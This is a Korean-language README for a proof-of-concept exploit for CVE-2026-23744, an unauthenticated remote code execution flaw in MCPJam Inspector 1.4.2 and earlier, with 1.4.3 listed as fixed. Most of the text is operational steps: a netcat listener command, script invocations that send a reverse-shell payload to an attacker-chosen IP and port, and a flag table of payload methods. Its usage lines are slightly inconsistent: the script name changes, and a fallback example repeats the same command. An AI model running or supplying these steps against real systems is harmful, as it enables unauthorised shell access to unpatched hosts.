
CVE-2026-23744 — MCPJam Inspector <= 1.4.2에서 인증되지 않은 원격 코드 실행 취약점에 대한 개념 증명 익스플로잇.
MCPJam Inspector <= 1.4.2는 기본적으로 0.0.0.0에 바인딩되며 인증 없이 /api/mcp/connect를 노출합니다. 이 엔드포인트는 호스트에서 직접 프로세스를 생성하는 serverConfig 객체를 허용합니다. 역방향 셸 페이로드를 전달하면 자격 증명 없이 즉시 RCE를 얻을 수 있습니다.
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
1단계 — 리스너 시작:
nc -lvnp 4444
2단계 — 익스플로잇 실행:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
대상에서 busybox가 작동하지 않으면 다른 방법을 시도하세요:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| 소프트웨어 | 취약 버전 | 수정 버전 |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |
| 플래그 | 설명 | 기본값 |
|---|
-u | 대상 URL | 필수 |
-i | 리스너 IP (LHOST) | 필수 |
-p | 리스너 포트 (LPORT) | 필수 |
-m | 페이로드 방법: busybox, bash, python3 | busybox |